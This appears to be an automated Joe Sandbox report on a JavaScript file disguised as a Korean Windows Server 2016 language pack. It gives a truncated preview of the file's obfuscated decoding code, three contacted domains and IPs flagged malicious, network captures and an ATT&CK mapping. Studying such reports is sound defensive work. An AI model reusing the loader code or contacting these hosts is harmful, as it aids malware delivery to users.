Analysis Report #Uc708#Ub3c4#Uc6b0_#Uc11c#Ubc84_2016_#Ud55c#Uae00_#Uc5b8#Uc5b4#Ud329(ya).js
Overview
General Information
Detection
Score: | 48 |
Range: | 0 - 100 |
Whitelisted: | false |
Confidence: | 100% |
Signatures
Classification
Startup |
---|
|
Malware Configuration |
---|
No configs have been found |
---|
Yara Overview |
---|
No yara matches |
---|
Sigma Overview |
---|
No Sigma rule has matched |
---|
Signature Overview |
---|
Click to jump to signature section
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | ASN Name: | ||
Source: | ASN Name: |
Source: | JA3 fingerprint: |
Source: | DNS traffic detected: |
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: | ||
Source: | Network traffic detected: |
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: | ||
Source: | HTTPS traffic detected: |
Source: | Process Stats: |
Source: | Initial sample: |
Source: | Classification label: |
Source: | Key opened: | Jump to behavior |
Source: | Key value queried: | Jump to behavior |
Source: | String : | Go to definition |
Source: | Process information set: | Jump to behavior | ||
Source: | Process information set: | Jump to behavior |
Source: | Window found: | Jump to behavior |
HIPS / PFW / Operating System Protection Evasion: |
---|
System process connects to network (likely due to code injection or exploit) | Show sources |
Source: | Domain query: | ||
Source: | Domain query: | ||
Source: | Domain query: |
Source: | Key value queried: | Jump to behavior |
Mitre Att&ck Matrix |
---|
Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact |
---|---|---|---|---|---|---|---|---|---|---|---|---|---|
Valid Accounts | Scripting3 | Path Interception | Process Injection1 | Process Injection1 | OS Credential Dumping | System Information Discovery2 | Remote Services | Data from Local System | Exfiltration Over Other Network Medium | Encrypted Channel2 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition |
Default Accounts | Scheduled Task/Job | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Scripting3 | LSASS Memory | Application Window Discovery | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Data Encoding1 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout |
Domain Accounts | At (Linux) | Logon Script (Windows) | Logon Script (Windows) | Obfuscated Files or Information1 | Security Account Manager | Query Registry | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol1 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data |
Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Binary Padding | NTDS | System Network Configuration Discovery | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol2 | SIM Card Swap | Carrier Billing Fraud |
Behavior Graph |
---|
Screenshots |
---|
Thumbnails
This section contains all screenshots as thumbnails, including those not shown in the slideshow.
Antivirus, Machine Learning and Genetic Malware Detection |
---|
Initial Sample |
---|
No Antivirus matches |
---|
Dropped Files |
---|
No Antivirus matches |
---|
Unpacked PE Files |
---|
No Antivirus matches |
---|
Domains |
---|
No Antivirus matches |
---|
URLs |
---|
No Antivirus matches |
---|
Domains and IPs |
---|
Contacted Domains |
---|
Name | IP | Active | Malicious | Antivirus Detection | Reputation |
---|---|---|---|---|---|
www.giuseppedeluigi.com | 188.40.120.141 | true | true | unknown | |
handekazanova.com | 5.2.87.151 | true | true | unknown | |
hagdahls.com | 193.42.159.175 | true | true | unknown | |
www.hagdahls.com | unknown | unknown | true | unknown | |
www.handekazanova.com | unknown | unknown | true | unknown |
Contacted IPs |
---|
- No. of IPs < 25%
- 25% < No. of IPs < 50%
- 50% < No. of IPs < 75%
- 75% < No. of IPs
Public |
---|
IP | Domain | Country | Flag | ASN | ASN Name | Malicious |
---|---|---|---|---|---|---|
5.2.87.151 | handekazanova.com | Turkey | 3188 | ALASTYRTR | true | |
193.42.159.175 | hagdahls.com | Sweden | 3246 | TDCSONGTele2BusinessTDCSwedenSE | true | |
188.40.120.141 | www.giuseppedeluigi.com | Germany | 24940 | HETZNER-ASDE | true |
General Information |
---|
Joe Sandbox Version: | 31.0.0 Emerald |
Analysis ID: | 371929 |
Start date: | 19.03.2021 |
Start time: | 11:01:04 |
Joe Sandbox Product: | CloudBasic |
Overall analysis duration: | 0h 11m 12s |
Hypervisor based Inspection enabled: | false |
Report type: | full |
Sample file name: | #Uc708#Ub3c4#Uc6b0_#Uc11c#Ubc84_2016_#Ud55c#Uae00_#Uc5b8#Uc5b4#Ud329(ya).js |
Cookbook file name: | default.jbs |
Analysis system description: | Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211 |
Number of analysed new started processes analysed: | 38 |
Number of new started drivers analysed: | 0 |
Number of existing processes analysed: | 0 |
Number of existing drivers analysed: | 0 |
Number of injected processes analysed: | 0 |
Technologies: |
|
Analysis Mode: | default |
Analysis stop reason: | Timeout |
Detection: | MAL |
Classification: | mal48.evad.winJS@1/0@3/3 |
EGA Information: | Failed |
HDC Information: | Failed |
HCA Information: |
|
Cookbook Comments: |
|
Warnings: | Show All
|
Simulations |
---|
Behavior and APIs |
---|
No simulations |
---|
Joe Sandbox View / Context |
---|
IPs |
---|
No context |
---|
Domains |
---|
No context |
---|
ASN |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
ALASTYRTR | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
TDCSONGTele2BusinessTDCSwedenSE | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
JA3 Fingerprints |
---|
Match | Associated Sample Name / URL | SHA 256 | Detection | Link | Context |
---|---|---|---|---|---|
ce5f3254611a8c095a3d821d44539877 | Get hash | malicious | Browse |
| |
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
| ||
Get hash | malicious | Browse |
|
Dropped Files |
---|
No context |
---|
Created / dropped Files |
---|
No created / dropped files found |
---|
Static File Info |
---|
General | |
---|---|
File type: | |
Entropy (8bit): | 5.4312811442166 |
TrID: | |
File name: | #Uc708#Ub3c4#Uc6b0_#Uc11c#Ubc84_2016_#Ud55c#Uae00_#Uc5b8#Uc5b4#Ud329(ya).js |
File size: | 2934 |
MD5: | f6fecdb26a8ba35b2321395d18a2ce2f |
SHA1: | d7e216e4412d802f30c970e0d5ec491b87a4dd06 |
SHA256: | 97cf892237f2e38cee38a700e4d27b11536fe0c471ced5ad7cf98f520941de07 |
SHA512: | d3eb4da73e9ab3f2bdd475a2e233c83056f94b11e54f8ab3d4f031b15c13453dd2312e534ac11992001117fdec814d7553d86d2d9705fad73d6e9f33914e7f21 |
SSDEEP: | 48:hXhC6tfg++v+L/pyIodn+0SOLRqKulR4BYzjFq1xsvU8NIuHXxAXEc9KpC9L9QXC:hXhxpTpsd+uhARYojU1WvU8N1lJXC |
File Content Preview: | function position(women,famous,table,motion,unit,past,fact) {return women.substr(famous,table);}..function black(you,body,fly,direct,win){reply="";end=land;while (end < 2972) {carry=size(you,end);reply=band(reply,carry,end); end++; }return reply;}..functi |
File Icon |
---|
Icon Hash: | e8d69ece968a9ec4 |
Network Behavior |
---|
Network Port Distribution |
---|
TCP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Mar 19, 2021 11:06:34.884170055 CET | 49746 | 443 | 192.168.2.3 | 5.2.87.151 |
Mar 19, 2021 11:06:34.970391989 CET | 443 | 49746 | 5.2.87.151 | 192.168.2.3 |
Mar 19, 2021 11:06:34.970550060 CET | 49746 | 443 | 192.168.2.3 | 5.2.87.151 |
Mar 19, 2021 11:06:34.977381945 CET | 49746 | 443 | 192.168.2.3 | 5.2.87.151 |
Mar 19, 2021 11:06:35.063671112 CET | 443 | 49746 | 5.2.87.151 | 192.168.2.3 |
Mar 19, 2021 11:06:35.065124989 CET | 443 | 49746 | 5.2.87.151 | 192.168.2.3 |
Mar 19, 2021 11:06:35.065187931 CET | 443 | 49746 | 5.2.87.151 | 192.168.2.3 |
Mar 19, 2021 11:06:35.065232038 CET | 443 | 49746 | 5.2.87.151 | 192.168.2.3 |
Mar 19, 2021 11:06:35.065273046 CET | 443 | 49746 | 5.2.87.151 | 192.168.2.3 |
Mar 19, 2021 11:06:35.065303087 CET | 443 | 49746 | 5.2.87.151 | 192.168.2.3 |
Mar 19, 2021 11:06:35.065427065 CET | 49746 | 443 | 192.168.2.3 | 5.2.87.151 |
Mar 19, 2021 11:06:35.065562010 CET | 49746 | 443 | 192.168.2.3 | 5.2.87.151 |
Mar 19, 2021 11:06:35.103548050 CET | 49746 | 443 | 192.168.2.3 | 5.2.87.151 |
Mar 19, 2021 11:06:35.190587997 CET | 443 | 49746 | 5.2.87.151 | 192.168.2.3 |
Mar 19, 2021 11:06:35.244297981 CET | 49746 | 443 | 192.168.2.3 | 5.2.87.151 |
Mar 19, 2021 11:06:35.275876045 CET | 49746 | 443 | 192.168.2.3 | 5.2.87.151 |
Mar 19, 2021 11:06:35.403578043 CET | 443 | 49746 | 5.2.87.151 | 192.168.2.3 |
Mar 19, 2021 11:06:35.488636971 CET | 443 | 49746 | 5.2.87.151 | 192.168.2.3 |
Mar 19, 2021 11:06:35.541225910 CET | 49746 | 443 | 192.168.2.3 | 5.2.87.151 |
Mar 19, 2021 11:06:46.050379038 CET | 443 | 49746 | 5.2.87.151 | 192.168.2.3 |
Mar 19, 2021 11:06:46.050420046 CET | 443 | 49746 | 5.2.87.151 | 192.168.2.3 |
Mar 19, 2021 11:06:46.050544977 CET | 49746 | 443 | 192.168.2.3 | 5.2.87.151 |
Mar 19, 2021 11:06:46.053093910 CET | 49746 | 443 | 192.168.2.3 | 5.2.87.151 |
Mar 19, 2021 11:06:46.053342104 CET | 49746 | 443 | 192.168.2.3 | 5.2.87.151 |
Mar 19, 2021 11:06:46.139257908 CET | 443 | 49746 | 5.2.87.151 | 192.168.2.3 |
Mar 19, 2021 11:06:46.139414072 CET | 443 | 49746 | 5.2.87.151 | 192.168.2.3 |
Mar 19, 2021 11:06:57.973525047 CET | 49752 | 443 | 192.168.2.3 | 193.42.159.175 |
Mar 19, 2021 11:06:58.042057991 CET | 443 | 49752 | 193.42.159.175 | 192.168.2.3 |
Mar 19, 2021 11:06:58.042212009 CET | 49752 | 443 | 192.168.2.3 | 193.42.159.175 |
Mar 19, 2021 11:06:58.043342113 CET | 49752 | 443 | 192.168.2.3 | 193.42.159.175 |
Mar 19, 2021 11:06:58.113799095 CET | 443 | 49752 | 193.42.159.175 | 192.168.2.3 |
Mar 19, 2021 11:06:58.115294933 CET | 443 | 49752 | 193.42.159.175 | 192.168.2.3 |
Mar 19, 2021 11:06:58.115339994 CET | 443 | 49752 | 193.42.159.175 | 192.168.2.3 |
Mar 19, 2021 11:06:58.115366936 CET | 443 | 49752 | 193.42.159.175 | 192.168.2.3 |
Mar 19, 2021 11:06:58.115411997 CET | 49752 | 443 | 192.168.2.3 | 193.42.159.175 |
Mar 19, 2021 11:06:58.120524883 CET | 49752 | 443 | 192.168.2.3 | 193.42.159.175 |
Mar 19, 2021 11:06:58.190462112 CET | 443 | 49752 | 193.42.159.175 | 192.168.2.3 |
Mar 19, 2021 11:06:58.195331097 CET | 49752 | 443 | 192.168.2.3 | 193.42.159.175 |
Mar 19, 2021 11:06:58.300904989 CET | 443 | 49752 | 193.42.159.175 | 192.168.2.3 |
Mar 19, 2021 11:06:58.345473051 CET | 443 | 49752 | 193.42.159.175 | 192.168.2.3 |
Mar 19, 2021 11:06:58.386776924 CET | 49752 | 443 | 192.168.2.3 | 193.42.159.175 |
Mar 19, 2021 11:07:20.712527037 CET | 49753 | 443 | 192.168.2.3 | 188.40.120.141 |
Mar 19, 2021 11:07:20.784955978 CET | 443 | 49753 | 188.40.120.141 | 192.168.2.3 |
Mar 19, 2021 11:07:20.785190105 CET | 49753 | 443 | 192.168.2.3 | 188.40.120.141 |
Mar 19, 2021 11:07:20.786292076 CET | 49753 | 443 | 192.168.2.3 | 188.40.120.141 |
Mar 19, 2021 11:07:20.858772039 CET | 443 | 49753 | 188.40.120.141 | 192.168.2.3 |
Mar 19, 2021 11:07:20.864888906 CET | 443 | 49753 | 188.40.120.141 | 192.168.2.3 |
Mar 19, 2021 11:07:20.864928007 CET | 443 | 49753 | 188.40.120.141 | 192.168.2.3 |
Mar 19, 2021 11:07:20.864950895 CET | 443 | 49753 | 188.40.120.141 | 192.168.2.3 |
Mar 19, 2021 11:07:20.865113020 CET | 49753 | 443 | 192.168.2.3 | 188.40.120.141 |
Mar 19, 2021 11:07:20.874982119 CET | 49753 | 443 | 192.168.2.3 | 188.40.120.141 |
Mar 19, 2021 11:07:20.949079990 CET | 443 | 49753 | 188.40.120.141 | 192.168.2.3 |
Mar 19, 2021 11:07:20.955142021 CET | 49753 | 443 | 192.168.2.3 | 188.40.120.141 |
Mar 19, 2021 11:07:21.067002058 CET | 443 | 49753 | 188.40.120.141 | 192.168.2.3 |
Mar 19, 2021 11:07:21.068221092 CET | 443 | 49753 | 188.40.120.141 | 192.168.2.3 |
Mar 19, 2021 11:07:21.138756037 CET | 49753 | 443 | 192.168.2.3 | 188.40.120.141 |
Mar 19, 2021 11:07:26.070419073 CET | 443 | 49753 | 188.40.120.141 | 192.168.2.3 |
Mar 19, 2021 11:07:26.070683002 CET | 49753 | 443 | 192.168.2.3 | 188.40.120.141 |
Mar 19, 2021 11:07:26.070975065 CET | 49753 | 443 | 192.168.2.3 | 188.40.120.141 |
Mar 19, 2021 11:07:26.071264982 CET | 49753 | 443 | 192.168.2.3 | 188.40.120.141 |
Mar 19, 2021 11:07:26.143408060 CET | 443 | 49753 | 188.40.120.141 | 192.168.2.3 |
Mar 19, 2021 11:07:26.143568039 CET | 443 | 49753 | 188.40.120.141 | 192.168.2.3 |
Mar 19, 2021 11:08:03.353650093 CET | 443 | 49752 | 193.42.159.175 | 192.168.2.3 |
Mar 19, 2021 11:08:03.353686094 CET | 443 | 49752 | 193.42.159.175 | 192.168.2.3 |
Mar 19, 2021 11:08:03.353873014 CET | 49752 | 443 | 192.168.2.3 | 193.42.159.175 |
Mar 19, 2021 11:08:03.354111910 CET | 49752 | 443 | 192.168.2.3 | 193.42.159.175 |
Mar 19, 2021 11:08:03.354186058 CET | 49752 | 443 | 192.168.2.3 | 193.42.159.175 |
Mar 19, 2021 11:08:03.422357082 CET | 443 | 49752 | 193.42.159.175 | 192.168.2.3 |
UDP Packets |
---|
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Mar 19, 2021 11:01:42.192513943 CET | 53 | 49199 | 8.8.8.8 | 192.168.2.3 |
Mar 19, 2021 11:01:43.120987892 CET | 50620 | 53 | 192.168.2.3 | 8.8.8.8 |
Mar 19, 2021 11:01:43.179915905 CET | 53 | 50620 | 8.8.8.8 | 192.168.2.3 |
Mar 19, 2021 11:01:44.274307966 CET | 64938 | 53 | 192.168.2.3 | 8.8.8.8 |
Mar 19, 2021 11:01:44.327225924 CET | 53 | 64938 | 8.8.8.8 | 192.168.2.3 |
Mar 19, 2021 11:01:45.449059010 CET | 60152 | 53 | 192.168.2.3 | 8.8.8.8 |
Mar 19, 2021 11:01:45.501038074 CET | 53 | 60152 | 8.8.8.8 | 192.168.2.3 |
Mar 19, 2021 11:01:46.694387913 CET | 57544 | 53 | 192.168.2.3 | 8.8.8.8 |
Mar 19, 2021 11:01:46.746539116 CET | 53 | 57544 | 8.8.8.8 | 192.168.2.3 |
Mar 19, 2021 11:01:48.100251913 CET | 55984 | 53 | 192.168.2.3 | 8.8.8.8 |
Mar 19, 2021 11:01:48.152627945 CET | 53 | 55984 | 8.8.8.8 | 192.168.2.3 |
Mar 19, 2021 11:01:48.903409004 CET | 64185 | 53 | 192.168.2.3 | 8.8.8.8 |
Mar 19, 2021 11:01:48.952738047 CET | 53 | 64185 | 8.8.8.8 | 192.168.2.3 |
Mar 19, 2021 11:01:49.731686115 CET | 65110 | 53 | 192.168.2.3 | 8.8.8.8 |
Mar 19, 2021 11:01:49.784218073 CET | 53 | 65110 | 8.8.8.8 | 192.168.2.3 |
Mar 19, 2021 11:01:50.988008022 CET | 58361 | 53 | 192.168.2.3 | 8.8.8.8 |
Mar 19, 2021 11:01:51.040585995 CET | 53 | 58361 | 8.8.8.8 | 192.168.2.3 |
Mar 19, 2021 11:01:52.122215033 CET | 63492 | 53 | 192.168.2.3 | 8.8.8.8 |
Mar 19, 2021 11:01:52.171628952 CET | 53 | 63492 | 8.8.8.8 | 192.168.2.3 |
Mar 19, 2021 11:01:53.752548933 CET | 60831 | 53 | 192.168.2.3 | 8.8.8.8 |
Mar 19, 2021 11:01:53.802371025 CET | 53 | 60831 | 8.8.8.8 | 192.168.2.3 |
Mar 19, 2021 11:01:54.936131954 CET | 60100 | 53 | 192.168.2.3 | 8.8.8.8 |
Mar 19, 2021 11:01:54.985773087 CET | 53 | 60100 | 8.8.8.8 | 192.168.2.3 |
Mar 19, 2021 11:01:56.777996063 CET | 53195 | 53 | 192.168.2.3 | 8.8.8.8 |
Mar 19, 2021 11:01:56.828882933 CET | 53 | 53195 | 8.8.8.8 | 192.168.2.3 |
Mar 19, 2021 11:01:57.728624105 CET | 50141 | 53 | 192.168.2.3 | 8.8.8.8 |
Mar 19, 2021 11:01:57.783907890 CET | 53 | 50141 | 8.8.8.8 | 192.168.2.3 |
Mar 19, 2021 11:01:58.906033993 CET | 53023 | 53 | 192.168.2.3 | 8.8.8.8 |
Mar 19, 2021 11:01:58.968369961 CET | 53 | 53023 | 8.8.8.8 | 192.168.2.3 |
Mar 19, 2021 11:01:59.934837103 CET | 49563 | 53 | 192.168.2.3 | 8.8.8.8 |
Mar 19, 2021 11:01:59.986741066 CET | 53 | 49563 | 8.8.8.8 | 192.168.2.3 |
Mar 19, 2021 11:02:01.059180021 CET | 51352 | 53 | 192.168.2.3 | 8.8.8.8 |
Mar 19, 2021 11:02:01.111623049 CET | 53 | 51352 | 8.8.8.8 | 192.168.2.3 |
Mar 19, 2021 11:02:02.011657000 CET | 59349 | 53 | 192.168.2.3 | 8.8.8.8 |
Mar 19, 2021 11:02:02.064460039 CET | 53 | 59349 | 8.8.8.8 | 192.168.2.3 |
Mar 19, 2021 11:02:16.890063047 CET | 57084 | 53 | 192.168.2.3 | 8.8.8.8 |
Mar 19, 2021 11:02:16.952132940 CET | 53 | 57084 | 8.8.8.8 | 192.168.2.3 |
Mar 19, 2021 11:02:21.639072895 CET | 58823 | 53 | 192.168.2.3 | 8.8.8.8 |
Mar 19, 2021 11:02:21.708971024 CET | 53 | 58823 | 8.8.8.8 | 192.168.2.3 |
Mar 19, 2021 11:02:37.259821892 CET | 57568 | 53 | 192.168.2.3 | 8.8.8.8 |
Mar 19, 2021 11:02:37.330265045 CET | 53 | 57568 | 8.8.8.8 | 192.168.2.3 |
Mar 19, 2021 11:02:37.761559010 CET | 50540 | 53 | 192.168.2.3 | 8.8.8.8 |
Mar 19, 2021 11:02:37.821451902 CET | 53 | 50540 | 8.8.8.8 | 192.168.2.3 |
Mar 19, 2021 11:02:53.329860926 CET | 54366 | 53 | 192.168.2.3 | 8.8.8.8 |
Mar 19, 2021 11:02:53.382158995 CET | 53 | 54366 | 8.8.8.8 | 192.168.2.3 |
Mar 19, 2021 11:02:57.478034973 CET | 53034 | 53 | 192.168.2.3 | 8.8.8.8 |
Mar 19, 2021 11:02:57.537441015 CET | 53 | 53034 | 8.8.8.8 | 192.168.2.3 |
Mar 19, 2021 11:03:29.648852110 CET | 57762 | 53 | 192.168.2.3 | 8.8.8.8 |
Mar 19, 2021 11:03:29.706775904 CET | 53 | 57762 | 8.8.8.8 | 192.168.2.3 |
Mar 19, 2021 11:03:32.327088118 CET | 55435 | 53 | 192.168.2.3 | 8.8.8.8 |
Mar 19, 2021 11:03:32.394345045 CET | 53 | 55435 | 8.8.8.8 | 192.168.2.3 |
Mar 19, 2021 11:04:38.636969090 CET | 50713 | 53 | 192.168.2.3 | 8.8.8.8 |
Mar 19, 2021 11:04:38.728332996 CET | 53 | 50713 | 8.8.8.8 | 192.168.2.3 |
Mar 19, 2021 11:04:40.705001116 CET | 56132 | 53 | 192.168.2.3 | 8.8.8.8 |
Mar 19, 2021 11:04:40.857007980 CET | 53 | 56132 | 8.8.8.8 | 192.168.2.3 |
Mar 19, 2021 11:04:41.695307970 CET | 58987 | 53 | 192.168.2.3 | 8.8.8.8 |
Mar 19, 2021 11:04:41.775482893 CET | 53 | 58987 | 8.8.8.8 | 192.168.2.3 |
Mar 19, 2021 11:04:42.320341110 CET | 56579 | 53 | 192.168.2.3 | 8.8.8.8 |
Mar 19, 2021 11:04:42.381618977 CET | 53 | 56579 | 8.8.8.8 | 192.168.2.3 |
Mar 19, 2021 11:04:42.916096926 CET | 60633 | 53 | 192.168.2.3 | 8.8.8.8 |
Mar 19, 2021 11:04:42.979516029 CET | 53 | 60633 | 8.8.8.8 | 192.168.2.3 |
Mar 19, 2021 11:04:43.600744963 CET | 61292 | 53 | 192.168.2.3 | 8.8.8.8 |
Mar 19, 2021 11:04:43.661540985 CET | 53 | 61292 | 8.8.8.8 | 192.168.2.3 |
Mar 19, 2021 11:04:44.341656923 CET | 63619 | 53 | 192.168.2.3 | 8.8.8.8 |
Mar 19, 2021 11:04:44.399178982 CET | 53 | 63619 | 8.8.8.8 | 192.168.2.3 |
Mar 19, 2021 11:04:47.434906960 CET | 64938 | 53 | 192.168.2.3 | 8.8.8.8 |
Mar 19, 2021 11:04:47.553935051 CET | 53 | 64938 | 8.8.8.8 | 192.168.2.3 |
Mar 19, 2021 11:04:49.017656088 CET | 61946 | 53 | 192.168.2.3 | 8.8.8.8 |
Mar 19, 2021 11:04:49.081226110 CET | 53 | 61946 | 8.8.8.8 | 192.168.2.3 |
Mar 19, 2021 11:04:49.611006021 CET | 64910 | 53 | 192.168.2.3 | 8.8.8.8 |
Mar 19, 2021 11:04:49.673470020 CET | 53 | 64910 | 8.8.8.8 | 192.168.2.3 |
Mar 19, 2021 11:06:34.806391001 CET | 52123 | 53 | 192.168.2.3 | 8.8.8.8 |
Mar 19, 2021 11:06:34.863960028 CET | 53 | 52123 | 8.8.8.8 | 192.168.2.3 |
Mar 19, 2021 11:06:38.449882030 CET | 56130 | 53 | 192.168.2.3 | 8.8.8.8 |
Mar 19, 2021 11:06:38.499075890 CET | 53 | 56130 | 8.8.8.8 | 192.168.2.3 |
Mar 19, 2021 11:06:39.161824942 CET | 56338 | 53 | 192.168.2.3 | 8.8.8.8 |
Mar 19, 2021 11:06:39.213901043 CET | 53 | 56338 | 8.8.8.8 | 192.168.2.3 |
Mar 19, 2021 11:06:43.595171928 CET | 59420 | 53 | 192.168.2.3 | 8.8.8.8 |
Mar 19, 2021 11:06:43.644575119 CET | 53 | 59420 | 8.8.8.8 | 192.168.2.3 |
Mar 19, 2021 11:06:47.041403055 CET | 58784 | 53 | 192.168.2.3 | 8.8.8.8 |
Mar 19, 2021 11:06:47.090845108 CET | 53 | 58784 | 8.8.8.8 | 192.168.2.3 |
Mar 19, 2021 11:06:47.409594059 CET | 63978 | 53 | 192.168.2.3 | 8.8.8.8 |
Mar 19, 2021 11:06:47.458925009 CET | 53 | 63978 | 8.8.8.8 | 192.168.2.3 |
Mar 19, 2021 11:06:57.773598909 CET | 62938 | 53 | 192.168.2.3 | 8.8.8.8 |
Mar 19, 2021 11:06:57.971992970 CET | 53 | 62938 | 8.8.8.8 | 192.168.2.3 |
Mar 19, 2021 11:07:20.634164095 CET | 55708 | 53 | 192.168.2.3 | 8.8.8.8 |
Mar 19, 2021 11:07:20.709536076 CET | 53 | 55708 | 8.8.8.8 | 192.168.2.3 |
Mar 19, 2021 11:09:03.476773024 CET | 56803 | 53 | 192.168.2.3 | 8.8.8.8 |
Mar 19, 2021 11:09:03.526168108 CET | 53 | 56803 | 8.8.8.8 | 192.168.2.3 |
Mar 19, 2021 11:09:39.334441900 CET | 57145 | 53 | 192.168.2.3 | 8.8.8.8 |
Mar 19, 2021 11:09:39.408806086 CET | 53 | 57145 | 8.8.8.8 | 192.168.2.3 |
DNS Queries |
---|
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class |
---|---|---|---|---|---|---|---|
Mar 19, 2021 11:06:34.806391001 CET | 192.168.2.3 | 8.8.8.8 | 0x8599 | Standard query (0) | A (IP address) | IN (0x0001) | |
Mar 19, 2021 11:06:57.773598909 CET | 192.168.2.3 | 8.8.8.8 | 0x8fcc | Standard query (0) | A (IP address) | IN (0x0001) | |
Mar 19, 2021 11:07:20.634164095 CET | 192.168.2.3 | 8.8.8.8 | 0x1335 | Standard query (0) | A (IP address) | IN (0x0001) |
DNS Answers |
---|
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class |
---|---|---|---|---|---|---|---|---|---|
Mar 19, 2021 11:06:34.863960028 CET | 8.8.8.8 | 192.168.2.3 | 0x8599 | No error (0) | handekazanova.com | CNAME (Canonical name) | IN (0x0001) | ||
Mar 19, 2021 11:06:34.863960028 CET | 8.8.8.8 | 192.168.2.3 | 0x8599 | No error (0) | 5.2.87.151 | A (IP address) | IN (0x0001) | ||
Mar 19, 2021 11:06:38.499075890 CET | 8.8.8.8 | 192.168.2.3 | 0x1b4c | No error (0) | www.tm.a.prd.aadg.trafficmanager.net | CNAME (Canonical name) | IN (0x0001) | ||
Mar 19, 2021 11:06:57.971992970 CET | 8.8.8.8 | 192.168.2.3 | 0x8fcc | No error (0) | hagdahls.com | CNAME (Canonical name) | IN (0x0001) | ||
Mar 19, 2021 11:06:57.971992970 CET | 8.8.8.8 | 192.168.2.3 | 0x8fcc | No error (0) | 193.42.159.175 | A (IP address) | IN (0x0001) | ||
Mar 19, 2021 11:07:20.709536076 CET | 8.8.8.8 | 192.168.2.3 | 0x1335 | No error (0) | 188.40.120.141 | A (IP address) | IN (0x0001) |
HTTPS Packets |
---|
Timestamp | Source IP | Source Port | Dest IP | Dest Port | Subject | Issuer | Not Before | Not After | JA3 SSL Client Fingerprint | JA3 SSL Client Digest |
---|---|---|---|---|---|---|---|---|---|---|
Mar 19, 2021 11:06:35.065273046 CET | 5.2.87.151 | 443 | 192.168.2.3 | 49746 | CN=handekazanova.com CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB | CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB | Fri Feb 26 01:00:00 CET 2021 Mon May 18 02:00:00 CEST 2015 Thu Jan 01 01:00:00 CET 2004 | Fri May 28 01:59:59 CEST 2021 Sun May 18 01:59:59 CEST 2025 Mon Jan 01 00:59:59 CET 2029 | 771,49196-49195-49200-49199-159-158-49188-49187-49192-49191-49162-49161-49172-49171-157-156-61-60-53-47-10,0-5-10-11-13-35-23-65281,29-23-24,0 | ce5f3254611a8c095a3d821d44539877 |
CN="cPanel, Inc. Certification Authority", O="cPanel, Inc.", L=Houston, ST=TX, C=US | CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB | Mon May 18 02:00:00 CEST 2015 | Sun May 18 01:59:59 CEST 2025 | |||||||
CN=COMODO RSA Certification Authority, O=COMODO CA Limited, L=Salford, ST=Greater Manchester, C=GB | CN=AAA Certificate Services, O=Comodo CA Limited, L=Salford, ST=Greater Manchester, C=GB | Thu Jan 01 01:00:00 CET 2004 | Mon Jan 01 00:59:59 CET 2029 | |||||||
